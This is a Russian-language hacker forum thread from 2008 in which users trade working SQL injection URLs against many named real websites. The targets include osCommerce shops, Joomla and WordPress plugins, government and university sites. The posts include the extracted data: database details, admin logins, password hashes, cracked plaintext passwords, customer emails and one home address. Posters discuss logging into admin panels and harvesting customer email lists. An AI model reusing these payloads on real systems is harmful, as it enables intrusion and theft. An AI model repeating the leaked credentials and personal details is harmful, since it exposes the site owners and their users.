http://www.photopips.com/wp-content/plugins/wordspew/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),co ncat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users
http://www.zulan.se/wp-content/plugins/wordspew/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),co ncat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users
http://www.pie2020.com/wp-content/plugins/wordspew/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),co ncat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users http://www.ilmanakbar.com/wp-content/plugins/wordspew/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),co ncat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users http://localize.org.ua/old/wp-content/plugins/wordspew/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),co ncat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users

Много хешей, не стал шифровать...

http://zona.dp.ua/dir/index.php?ParentID=9999+union+select+1,concat_ws(0 x3a,version(),user(),database()),3,4,5/*
5.0.33-standard
zona@10.0.0.1
zona
http://zona.dp.ua/dir/index.php?ParentID=9999+union+select+1,table_name, 3,4,5+from+information_schema.tables/*
несколько интересных таблиц

Sharingan

03.02.2008, 15:05

http://www.frontnational.com/communique_detail.php?id=-1+union+select+1,2,concat(database(),0x3a,user(),0 x3a,version()),4/*
frontnatfn:frontnatfn@10.0.61.118:5.0.44-log

http://www.itd.cnr.it/news.php?ID=-41+union+select+1,2,version(),4,5,6,7,8,9,0,1,2,3, 4/*
5.0.22-Debian_0ubuntu6.06.5-log
находим интересные таблицы, типа t_admins
и собственно там и находим админа
http://www.itd.cnr.it/news.php?ID=-41+union+select+1,2,3,concat(username,0x3a,passwd) ,5,6,7,8,9,0,1,2,3,4+from+telma2.t_admins/*
admin:21232f297a57a5a743894a0e4a801fc3
bettina:ACB4A77114F483CE965A7D55A61D0E4B
судя по базе log: pass
admin:admin :D

ElteRUS

03.02.2008, 21:06

http://www.coreyholms.com/portfolio/project.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7,8,9/*

4.1.20/coreyholms_db1/coreyholms@localhost
-----------------------------------------------------------------------------
taylormarsh.com

http://www.taylormarsh.com/archives_view.php?id=-1'+union+select+1,2,3,4,5,6,concat_ws(0x2F,version (),database(),user()),8,9/*

4.1.20/taylormarsh/taylormarsh@localhost

http://www.taylormarsh.com/archives_view.php?id=-1'+union+select+1,2,3,4,5,6,concat_ws(0x2F,usernam e,password,email),8,9+from+users/*

логин/хеш/мейл
tmarsh/959b43c9d1b14f6281eceea6e1762370/taylor@taylormarsh.com

Momiji

03.02.2008, 23:00

koreateacher.com
http://www.koreateacher.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1+union+select+1,concat_ws(0x3,version(),user(),da tabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20/*
5.0.45koreateacher@localhostkoreateacher
http://www.koreateacher.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1+union+select+1,concat_ws(0x3,username,password,i d),null,null,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20+from+mos_users/*
turk_the_ripperf653d1fcff57e27242cd72ba617120256 2
http://koreateacher.com/administrator/index.php

riac.ca
http://riac.ca/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1+union+select+1,concat_ws(0x3,version(),user(),da tabase()),null,null,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20+from+jos_users/*
5.0.33-standard-mpbriac_joom1@localhostriac_joom1
http://riac.ca/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1+union+select+1,concat_ws(0x3,username,password,e mail),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20+from+jos_users/*
admin28b84c0788be703904d31af1027553faadmin@riac. ca
http://riac.ca/administrator/index.php

israeltown.com
http://www.israeltown.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1+union+select+1,concat_ws(0x3,version(),user(),da tabase()),null,null,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20/*
4.1.22-standardisraelto_mambo@localhostisraelto_mambodb
http://www.israeltown.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1+union+select+1,concat_ws(0x3,username,password,e mail),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20+from+mos_users/*
admin0e17fe383fffa9118672142fc5033cdcadmin@israe ltown.com
http://www.israeltown.com/administrator/index.php

Серенький

04.02.2008, 00:22

phpbb forum

http://rc-aviahobby.butovonet.ru/RCgallery/index.php?cat=-1+union+select+1,concat_ws(0x3a,user_id,username,u ser_password,user_email,user_level),3,4,5,6+from+p hpbb2_users/*

fRg

04.02.2008, 16:01

kunzweiler-international.comhttp://www.kunzweiler-international.com/print.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user()),2,3/* 4.0.27-log : DB168348 : U168348@saveloy.stor

horizons.gamersinfo.nethttp://horizons.gamersinfo.net/guides/default.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(concat_ws (0x3a,version(),database(),user()),0x71),0x71),3,4 ,5,6,7,8/* 4.1.15-Debian_1ubuntu5-log:gamers_horizons:gamers_dbus3r@192.168.0.18

DifusionJuridica.eshttp://www.difusionjuridica.es/HTML/bar/default.php?id=-1+union+select+null,version(),null-- PostgreSQL 8.1.9 on i486-pc-linux-gnu, compiled by GCC gcc-4.0.gcc-opt (GCC) 4.0.3 (Ubuntu 4.0.3-1ubuntu5)

Здесь все табы:http://www.difusionjuridica.es/HTML/bar/default.php?id=-1+union+select+null,TABLE_NAME,null+FROM+INFORMATI ON_SCHEMA.TABLES+LIMIT+184+OFFSET+1-- Кому интересно - посмотрит поля сам...

159932

04.02.2008, 16:03

http://www.to-rent.ru/contact_info.php?id=-19062+union+select+1,2,3,concat_ws(0x3a,password,l ogin,is_admin),5,6,7,8,9,0,1,2,3,4,5,6+from+u32388 .vip_users+limit+0,1/*
5.0.45-log
admin:lifevfcnth
-----------------------------------------------------
http://www.moloprom.ru/editorial/new/?year=2008&month=1&newid=-629+union+select+1,2,3,4,5,6,7,8,9/*
табл с пассами нету ((
-----------------------------------------------------
http://www.ctdlock.ru/products.php?item=-909+union+select+concat_ws(0x3a,login,pwd),2+from+ users+limit+0,1/*
standart@ctdlock.ru:dab4b2d3a9e56590b9d54e6ab2d252 ea:ge1954
http://www.ctdlock.ru/admin
пасс не подошёл - а может логин ((
-----------------------------------------------------
http://www.michinokubank.ru/index.php?page=240&id=-41+union+select+1,concat_ws(0x3a,login,password),3 ,4+from+users+limit+3,1/*
http://michinokubank.ru/admin
FalinA:FalinA

ElteRUS

04.02.2008, 17:24

http://www.hpol.org/transcript.php?id=-1+union+select+1,2,3,4,concat_ws(0x2F,version(),da tabase(),user())/*

5.0.27/hpol/ro@localhost
-----------------------------------------------------------------------------

http://aboen.or.id/blog/index.php?more&id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7/*

4.1.22-standard/aboen_simple/aboen_aboen@localhost
-----------------------------------------------------------------------------

http://www.cantonrep.com/index.php?ID=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at_ws(0x2F,cast(version()+as+binary),cast(database ()+as+binary),cast(user()+as+binary))/*

4.1.12/cantonrep01/therep_01@localhost
-----------------------------------------------------------------------------
philadelphiaweekly.com

http://www.philadelphiaweekly.com/view.php?id=-1+union+select+1,2,concat_ws(0x2F,cast(version()+a s+binary),cast(database()+as+binary),cast(user()+a s+binary)),4,5/*

4.1.12-standard/philly_review_db/philly_review@rp1

http://www.philadelphiaweekly.com/view.php?id=-1+union+select+concat_ws(0x2F,uname,pword,email,fn ame,lname,address,city,state),2,3,4,5+from+users+l imit+1,1/*

логин/пароль/мейл/first name/last name/адрес/город/штат
mcobb/tango/mcobb@reviewpublishing.com/Mishel/Cobb/501 N. 32nd Street/Philadelphia/PA

The data entered on this page is secure, and cannot be viewed by a third party. PW only stores your account info for the purpose of promotional contests and the eNewsletter mailing list. Account information will never be shared with or sold to a third party. You will not receive any unsolicited (Spam) email as a result of registering!

Гыгыгы .. (:

Sharingan

04.02.2008, 18:08

http://www.culturagalega.org/temadia.php?id=-1+union+select+1,concat(user(),0x3a,database(),0x3 a,version()),3,4,5,6,7,8,9,10,11,12,13,14/*
Admin@localhost:cultura:5.0.27-log

http://www.justlikehiphop.com/fichemenu.php?id=-1+union+select+1,2,3,concat(version(),0x3a,user(), 0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*
4.0.25-standard-log:justlikejlhh@10.0.63.51:justlikejlhh

http://www.francparler.com/syntagme.php?id=-242+union+select+1,concat(user(),0x3a,database(),0 x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
francparv2_new@10.0.5.52:francparv2_new:4.0.25-standard-log

http://www.competencemicro.com/booklet.php?id=-170+union+select+1,2,concat(version(),0x3a,user(), 0x3a,database())/*
4.0.20-standard:competencemicro@localhost:database

razzzar

05.02.2008, 00:08

http://www.emap.usask.ca/news/read.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version (),database()),5,6,7,8,9,10/*emap@localhost:5.0.22:emap
http://www.rfidupdate.com/articles/index.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),v ersion(),database()),8,9,10,11,12,13,14,15/*rfidup2_tester1@localhost:5.0.27-standard:rfidup2_rfidupdate

it's my

05.02.2008, 10:42

http://www.alparysoft.ru/products.php?id=10&item=99999999+union+select+1,2,3,4,5,6,7,8,9,10,co ncat(user(),0x3a,version(),0x3a,database()),12,13, 14,15,16,17,18,19,20,21,22,23/*
http://referat.com.ua/referat_show.php?id=-999999'+union+select+concat(version(),0x3a,user()) ,2,3,4,database(),6,7/*

ElteRUS

05.02.2008, 18:11

http://www.artistportfolio.net/index.php?secret=140&artist_id=-1+union+select+1,2,concat_ws(0x2F,cast(version()+a s+binary),cast(database()+as+binary),cast(user()+a s+binary)),4/*

4.1.11-Debian_4sarge8-log/ap/ap@localhost

-----------------------------------------------------------------------------

http://www.nyla.org/index.php?page_id=-1'+union+select+1,2,3,4,concat_ws(0x2F,cast(versio n()+as+binary),cast(database()+as+binary),cast(use r()+as+binary)),6,7,8,9,1,1,1,1,1,1,1,1,1,1,1,1/*

4.1.18-log/nyla/katm9t5s@localhost

http://www.nyla.org/index.php?page_id=-1'+union+select+1,2,3,4,concat_ws(0x2F,name,passwo rd),6,7,8,9,1,1,1,1,1,1,1,1,1,1,1,1+from+users+lim it+0,1/*

имя/пароль
deputydir252/huds0n

Momiji

05.02.2008, 18:17

tmaxclub.it

http://www.tmaxclub.it/index.php?page=-1%20union+select+1,2,3,4,5,concat_ws(0x3,version() ,user(),database())/*
4.0.20a-nttmaxclub@localhosttmaxclub

http://www.tmaxclub.it/index.php?page=-1%20union+select+1,2,3,4,5,concat_ws(0x3,username, user_password,user_email,user_icq)+from+phpbb_user s+where+user_id=5/*
Pol4fd1981a0ccfb891136e011c4aa1f799paolo.d@tmaxc lub.it (это админ сайта)

ElteRUS

05.02.2008, 19:47

http://www.lawfirm.ee/image_view.php?img_id=-1+union+select+1,concat_ws(0x2F,version(),database (),user())/*

4.1.22/d13410sd10549/d13410sa17404@z129.zone.ee
-----------------------------------------------------------------------------

http://www.arcade-history.com/index.php?page=detail&id=-1+union+select+concat_ws(0x2F,version(),database() ,user()),2/*

5.0.45-log/arcade-historycom/teamhistory@imu124.infomaniak.ch
-----------------------------------------------------------------------------

http://mobile.jlaudio.com/multimedia_pages.php?page_id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4/*

4.0.23-nt/jlaudio/jldbuser@localhost

http://mobile.jlaudio.com/multimedia_pages.php?page_id=-1+union+select+1,2,concat_ws(0x2F,username,passwor d),4+from+users/*

логин/пароль
admin/m@n@ge

Sharingan

06.02.2008, 02:28

http://www.culturefemme.com/actualites/detail.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3,4 ,5,6/*
5.0.44-log
отсюда
http://www.culturefemme.com/actualites/detail.php?id=-1+union+select+1,concat(admin_login,0x3a,admin_pwd ),3,4,5,6,7,8,9,0,1,2,3,4,5,6+from+culturefclf.new slet_admin/*
всего 1 юзвер afroqueen:d0a22f9bf34b1a398e90136ec03a9f19
мб это и есть админ, хеш кинул на разшифровку =)

http://www.scenenationale61.com/detail_spectacles.php?id=-97+union+select+1,2,3,4,5,concat(version(),0x3a,us er(),0x3a,database()),7/*
4.0.25-standard-log:scenenatsnaf@10.0.62.25:scenenatsnaf

http://www.presencemusulmane.org/publication_view.php?id=-34+union+select+1,2,3,4,5,concat(version(),0x3a,us er(),0x3a,database()),7,8,9,0,1,2/*
4.0.27-max-log:dbo152695116@74.208.16.155:db152695
со 2й попытки подобрал название
http://www.presencemusulmane.org/publication_view.php?id=-34+union+select+1,2,3,4,5,concat(user,0x3a,passwor d),7,8,9,0,1,2+from+users/*
presencemusulmane:!Islam2006***
presencemusulmaneottawa:!Ottawa2006*
к фтп оба не подходят =(

it's my

06.02.2008, 11:19

http://www.fartingpreacher.org/index.php?action=showpic&cat=9999999&pic=9999999&pic=-1+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22/*
http://www.stopmoshorts.com/gallery/index.php?action=showpic&cat=9999999&pic=9999999&pic=-1+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22/*

random

06.02.2008, 12:03

edu

http://complit.princeton.edu/index.php?app=people&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,aes_decrypt(aes_encrypt(v ersion(),0x41),0x41),25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42/*
http://www.hudson.edu/list.php?id=-536+union+select+1,2,aes_decrypt(aes_encrypt(versi on(),0x41),0x41),4,5,6/*
http://wellness.byu.edu/cat.php?id=-3'+union+select+1,2,3,4,version(),6,7,8/*
http://telecom.colorado.edu/index.php?load=content&page_id=-79+union+select+1,2,3,4,version(),6,7,8,9,10/*
http://www.calnorthern.edu/index.php?action=schedule&f_id=18+union+select+1,2,3,4,aes_decrypt(aes_encry pt(version(),0x41),0x41),6,7,8,9,10,11,12,13,14,15/*
http://www.adison.edu/jobs_careers.php?cat_id=-3391+union+select+version(),2,3,4/*
http://www.nassonu.edu/show_cat.php?cat_id=-53+union+select+version(),2,3,4/*
http://www.peel.edu/website-resources.php?cat_id=-13580+union+select+version(),2,3,4/*

it's my

06.02.2008, 14:45

Магазин Октава (Музыкальное оборудование)
http://www.oktava-shop.com/view_prod.php?id=999999+union+select+1,concat(user (),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,1 0,11,12,13,14/*

fRg

06.02.2008, 16:11

cural.ru - Мультимедиа-группа КСК - ведущий российский разработчик
комплексных презентационных решений.http://www.cural.ru/core.php?p=283&nag=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9/* 5.0.45-log:cural:csc@localhost

На клиентов этой медиа-группы стоит взглянуть!!!:http://www.cural.ru/core.php?p=2

ElteRUS

06.02.2008, 19:37

http://www.mostiko.com/index.php?page=artist&view=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4/*

4.0.24_Debian-10-log/mostiko/mostiko@localhost
----------------------------------------------------------------------------

http://pray4exeter.clearthought.co.uk/dispArt.php?art=-1+union+select+1,2,3,4,5,concat_ws(0x2F,version(), database(),user()),7,8,9/*

5.0.45-community/web17-pray4exete/web17-pray4exete@localhost
----------------------------------------------------------------------------

http://www.fairvote.org/index.php?page=200&articlemode=showspecific&showarticle=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7/*

5.0.45-community/fairvote_gonearethedays/fairvote_rsquare@localhost
----------------------------------------------------------------------------
tangodiva.com

http://www.tangodiva.com/index.php?page=features&j=1&cat=1&story_id=-1+union+select+concat_ws(0x2F,cast(version()+as+bi nary),cast(database()+as+binary),cast(user()+as+bi nary))/*

4.1.20/tangodiv tangodiva/tangodiv@localhost

http://www.tangodiva.com/index.php?page=features&j=1&cat=1&story_id=-1+union+select+concat_ws(0x2F,username,password,em ail)+from+td_users+limit+3300,1/*

логин/пароль/мейл
samgrinter/lyn2370/samgrinter@tangodiva.com

satana8920

07.02.2008, 09:16

http://www.wallables.com/catalog/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.tickettoride.org.uk/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.snazzycat.com/oscommerce/catalog/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.reggae.it/catalog2/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.purelyalpaca.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://store.legendtv.co.uk/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.amenbeads.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.compra-segura.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.sweetsunnah.fr/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.magoloco.com/tienda/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*

вооо берем парсер мыльников и парсим базу и получаем на ваыходе крутую штуку блин =)))

it's my

07.02.2008, 09:18

http://shinza.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://irisgift.com/catalog/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8,9+from+customers/*
http://www.amenbeads.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.purelyalpaca.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*

Подробности тут: https://forum.antichat.ru/showpost.php?p=586483&postcount=59

Isis

07.02.2008, 11:33

http://fortedistribution.co.uk/title.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws( 0x3a,username,password),30,31,32,33,34,35,36+from+ users/*

Заходим в шоп...покупаем че-нить =\

fRg

07.02.2008, 13:33

wwf.or.id - инданезийское представительство Всемирного фонда дикой природы
(Есть прикольный такой лэйбл с пандой!)http://www.wwf.or.id/tessonilo/Default.php?ID=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11,12,13,14,15/*&wwf_lang=15.0.37:wwfdb:wwfid@localhost

big_BRAT

07.02.2008, 16:39

Yadro banner network
http://web.yadro.ru/vbnstat.php3?vbnum=2+and+1=if(ascii((select+versio n())=0x34),1,0)--
версия mysql 4
// вообще в запросе 12 полей и отлично проходит запрос вида ?vbnum=-2+UniOn+selEct+1,2,3,4,5,6,7,8,9,0,1,2--
но, нормально раскрутить не получилось, как цель себе не ставил
======================
SecurIT — защита информации, информационная безопасность /Программы Zlock, Zserver.../
http://www.securit.ru/press/news/?id=-63+uNioN+selEct+1,2,3,4,concat(version(),0x3a,user (),0x3a,database()),6,7,8,9,0,1--
5.0.45-log:u17160@10.10.10.219:u17160

http://www.securit.ru/press/news/?id=-63+uNioN+selEct+1,2,3,4,concat(table_schema,0x3a,t able_name,0x3a,column_name),6,7,8,9,0,1+from+infor mation_schema.columns+where+column_name=0x70617373 776f7264+limit+0,1--
u17160:USERS:PASSWORD

ReVOLVeR

07.02.2008, 17:12

http://www.purelyalpaca.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://shop.dipngrip.com/customer_testimonials.php?testimonial_id=99999+uni on+sele ct+1,2,concat(customers_lastname,0x3a,customers_pa ssword,0x3a,customers_email_address),4,5,6,7,8+fro m+customers/
*
http://www.wi-gear.com/customer_testimonials.php?testimonial_id=99999+uni on+sel ect+1,2,concat(customers_lastname,0x3a,customers_p assword,0x3a,customers_email_address),4,5,6,7,8+fr om+customers/*
http://www.stoneycreekshop.co.nz/customer_testimonials.php?testimonial_id=99999+uni on+sele
ct+1,2,concat(customers_lastname,0x3a,customers_pa ssword,0x3a,customers_email_address),4,5,6,7,8+fro m+customers/*
http://www.littlepinkshop.com/shop/customer_testimonials.php?testimonial_id=99999+uni o n+select+1,2,concat(customers_lastname,0x3a,custom ers_password,0x3a,customers_email_address),4,5,6,7 ,8+from+customers/*
http://www.genesissurfshop.com/shop/customer_testimonials.php?testimonial_id=99999+uni on+se
lect+1,2,concat(customers_lastname,0x3a,customers_ password,0x3a,customers_email_address),4,5,6,7,8+f rom+customers/*
http://www.jaxteas.com/customer_testimonials.php?testimonial_id=99999+uni o
n+select+1,2,concat(customers_lastname,0x3a,custom ers_password,0x3a,customers_email_address),4,5,6,7 ,8+from+customers/*

~EviL~

07.02.2008, 17:17

http://www.bulgarianbasket.com/

http://www.bulgarianbasket.com/bg/news2.php?id=-11863'+UNION+SELECT+concat_ws(0x3a,version(),user( ),database())/*
4.0.24_Debian-9:u397425_DB10614@wh2.dirbg.com: DB10614
(поле вывода в заголовке страницы)

http://www.bulgarianbasket.com/bg/news2.php?id=-11863'+UNION+SELECT+concat_ws(0x3a,username,userpa ss)+FROM+user/*
vladi:7605f18a510a03c7::vladi

http://www.hpol.org/

http://www.hpol.org/transcript.php?id=-72+UNION+SELECT+1,concat_ws(0x3a,version(),user(), database()),3,4,5/*
5.0.27:ro@localhost:hpol

http://www.cbc.ca/

http://www.cbc.ca/thehour/video.php?id=-1073+UNION+SELECT+null,null,null,version(),null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null/**/
PostgreSQL 7.4.17 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.3.3 (SuSE Linux)
(здесь мне пришлось помучаться :D )

nex0

07.02.2008, 22:48

metallica.ru
http://www.metallica.ru/bbs.php3?id=999999999+union+select+convert(concat( version(),%22:%22,user(),%22:%22,database()),binar y)/*
version() 4.1.16
user() acillatem@localhost
database() meta2000

iso-9001.ru
http://www.iso-9001.ru/index.php3?id=146+union+select+1,2,3,4,5,concat(ve rsion(),0x3a,user(),0x3a,database()),7,8,9
version() 4.1.22
user() so_user@localhost
database() iso_9001

pricenews.dp.ua
http://www.pricenews.dp.ua/predpr.php3?id=99999+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,1999,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34/*
version() 5.0.27
user() dprice@localhost
database() price

http://www.elitwater.ru/index.phtml?pid=99999+union+select+1,2,3,version() ,5,6,7,8,9/*
infon.ru :D
http://www.infon.ru/notice.phtml?nid=99999+union+select+1,convert((con cat(version(),0x3a,user(),0x3a,database())),binary )
version() 4.1.12
user() portal_manjet@localhost
database() portal_manjet

sosna.ru
http://www.sosna.ru/index.phtml?nid=99999+union+select+1,2,3,concat(ve rsion(),0x3a,user(),0x3a,database()),5,6/*
version() 5.0.45-log
user() u71952@10.10.223.224
database() u71952_sosna_ru

vogss.ru
www.vogss.ru/print.phtml?nid=999+union+select+1,2,3/*
version() 4.1.22-log
user() vogss@localhost
database() vogss

elitwater.ru
http://www.elitwater.ru/index.phtml?pid=99999+union+select+1,2,3,version() ,5,6,7,8,9/*
version() 5.0.22
user() elitwater@localhost
database() elitwater

~EviL~

07.02.2008, 23:00

http://epetitions.bristol.gov.uk/

http://epetitions.bristol.gov.uk/petition.php?id=161+UNION+SELECT+concat_ws(0x3a,ve rsion(),user(),database()),2,3,4,5,6,7,8,9,10,11,1 2,13,14/*
5.0.44-log:epetitioner_user@localhost:bristol_epetitioner

http://epetitions.bristol.gov.uk/petition.php?id=161+UNION+SELECT+1,concat_ws(0x3a, id,username,password,email),3,4,5,6,7,8,9,10,11,12 ,13,14+FROM+usertemp/*
1:mcheverton: password:miles.cheverton@public-i.info
(http://epetitions.bristol.gov.uk/)

http://www.pjn.gov.ar/

http://www.pjn.gov.ar/getobj.php?id=-25722+UNION+SELECT+1,2,concat_ws(0x3a,version(),us er(),database())/*
5.0.38-Ubuntu_0ubuntu1-log: pjn@192.168.1.40:webpjn

Momiji

08.02.2008, 01:16

intersoft.pl
http://www.intersoft.pl/index.php?link_id=1&lvl=1&p=31+UNION+SELECT+1,concat_ws(0x3,version(),user() ,database()),3,4,5+from+mysql.user/*
5.0.22-community-ntcms@iron.INTERsoft.localintersoft
http://www.intersoft.pl/index.php?link_id=1&lvl=1&p=31+UNION+SELECT+1,concat_ws(0x3,version(),user() ,database()),3,4,5+from+mysql.user/*
root74ecc53c5b07539b
admin56e5812a73345d40
cms4c6676a15e990b3c
sklep7e3186c51e422e57
ankieta28583f5150f129bc
forum0c87462e7823e478
arcadia465e2df62544abdd
http://www.intersoft.pl/index.php?link_id=1&lvl=1&p=31+UNION+SELECT+1,concat_ws(0x3,id,user,pass,imi e,nazwisko),3,4,5+from+admins/*
1adminjch123JaroslawChudzik
Админка: http://www.intersoft.pl/admin/

AkyHa_MaTaTa

08.02.2008, 14:03

http://specserver.com/rus/notice.asp?groupID=1+or+1=@@version--

big_BRAT

08.02.2008, 15:52

www.lanbilling.ru
LANBilling биллинговая система
http://www.lanbilling.ru/filedownload/download.php?action=rate&id=-12'+UnIon+SeleCt+1,concat(version(),0x3a,user(),0x 3a,database()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/*
5.0.26:lbdownuser@84.16.130.34:lb_download
http://www.lanbilling.ru/filedownload/download.php?action=rate&id=-12'+UnIon+SeleCt+1,table_name,3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8+from+information_schema.tables+limit+0 ,1/*
интересные таблицы(поля):
pafiledb_admin(admin_id,admin_username,admin_passw ord,admin_email)
pafiledb_license(license_id,license_name,license_t ext)

1:Admin:f41b01afce262acf56b0f89b6c88b732

===============================
только что просмотрел исходник страницы оказывается это paFileDB 3.0. и на securitylab не нашёл инфы о такой иньекции, :D это потянет на новость?)))
----------------
поставил последнюю версию paFileDB, фишка не работает, уже стоит intval()

NilsonUA

08.02.2008, 16:28

Holokost

08.02.2008, 17:43

http://www.c-ib.ru/content.php?txt=-7%20union%20select%201,2,version(),user()/*

CraZee

08.02.2008, 19:09

Уязвяшки:

http://www.redglobe.de/index.php?option=com_ynews&Itemid=1&task=showYNews&id=-1+union+select+0,1,2,concat(username,0x3a,password ),null,5,6+from+jos_users/*

Redaktion:d0d67fa9e0a04b037ad308c952ac0f19:2oXYS0T ysfDNgY1O

Bayern:157a8efa7606d16829d690677b9f7e73:hFN6dzgN7m w528lX
Komsomolze:e0b6b71e0f20a8d562fa04d1858298c5:YooDNS KSxbF7nLNf
Sirdon:c1f95d2d9f01c205776d9e4756ee1401
Vera:285a81de436e1b964fe95255e48c76ea

----------------------------
http://www.gsv1.de/gsv_joomla/index.php?option=com_ynews&Itemid=1&task=showYNews&id=-1+union+select+0,1,2,concat(username,0x3a,password ),null,5,6+from+jos_users/*

admin:8c30df2b67d3120cb38725b59a8a12b0:FTwfwq9zdpC oVVaRvxxO4h6PKIAD0AY7

.Begemot.

08.02.2008, 22:13

masarykovazs.eu
http://www.masarykovazs.eu/index.php?clanek=-155+union+select+0,concat(USER(),0x3a,VERSION(),0x 3a,DATABASE()),2,3,4,5,6,7,8,9,10,11/*
masarykovazs.eu@localhost:5.0.38-Debian_1-log:masarykovazs_eu
http://www.masarykovazs.eu/index.php?clanek=-155+union+select+0,table_name,2,3,4,5,6,7,8,9,10,1 1+from+info rmation_schema.tables/*
